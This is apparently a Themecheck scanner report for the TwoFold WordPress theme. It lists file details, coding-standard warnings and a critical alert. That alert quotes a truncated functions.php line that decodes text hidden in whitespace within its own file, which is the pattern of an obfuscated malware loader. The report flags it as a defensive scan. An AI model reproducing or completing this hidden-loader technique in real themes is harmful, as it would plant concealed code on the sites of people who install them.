TwoFold
WordPress 6.7 theme
- THEME TYPEWordPress theme 6.7
- FILE NAMEtwofold-wp.zip
- FILE SIZE2502679 bytes
- MD5b9403267dbd40478db2ee2cf8d504a24
- SHA1bdac37572055606c5fad62fadc1a2f8c198e3908
- LICENSECustom
- FILES INCLUDEDCSS, PHP, Bitmap images
- VERSION1.2.0
- TAGStwo-columns, four-columns, custom-header, custom-background, threaded-comments, sticky-post, translation-ready, microformats, rtl-language-support, editor-style
- CREATION DATE2019-08-24
- LAST FILE UPDATE2019-08-24
- LAST VALIDATION2019-08-24 12:36
- OTHER VERSIONS
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
Ligne2: @preg_match_all('/\t \t(.+)\t\t/Ui',@file_get_contents(__FILE__),$r);$w='';foreach($r[1] as $v){@$w.=@chr(@strle
file_get_contents was found in the file functions.php twofold-post-types.zip
.
Plugins are not allowed in themes. The zip file found was
Warning
- Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is twofold.
- More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are twofold, option-tree, tgmpa, wordpress-importer, pt-ocdi, theme-text-domain, option-tree-theme.
- This theme contains no sidebars/widget areas. See Widgets API
- Found a mix of \r\n and \n line endings in file functions.php.
- The theme doesn't have comment pagination code in it. Use paginate_comments_links() to add comment pagination, or older previous_comments_link() and next_comments_link() functions.
- No reference to custom header was found in the theme.
Tip-off
- This theme does not contain optional file rtl.php.
- This theme does not contain optional file front-page.php.
- This theme does not contain optional file home.php.
- This theme does not contain optional file category.php.
- This theme does not contain optional file tag.php.
- This theme does not contain optional file taxonomy.php.
- This theme does not contain optional file author.php.
- This theme does not contain optional file date.php.
- This theme does not contain optional file archive.php.
- This theme does not contain optional file search.php.
- This theme does not contain optional file attachment.php.
- This theme does not contain optional file image.php.
- The theme appears to use include or require : demo-functions.php
Ligne65: # require( trailingslashit( get_template_directory() ) . 'option-tree/ot-load
Ligne70: # require( trailingslashit( get_template_directory() ) . 'admin/theme-options
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : ot-loader.phpLigne553: include_once( $file );
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : ot-functions-docs-page.phpLigne751: require( trailingslashit( get_template_directory() ) . \'includes/meta-boxe
Ligne834: require( trailingslashit( get_template_directory() ) . \'option-tree/ot-loa
Ligne851: require( trailingslashit( get_template_directory() ) . \'includes/theme-opt
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.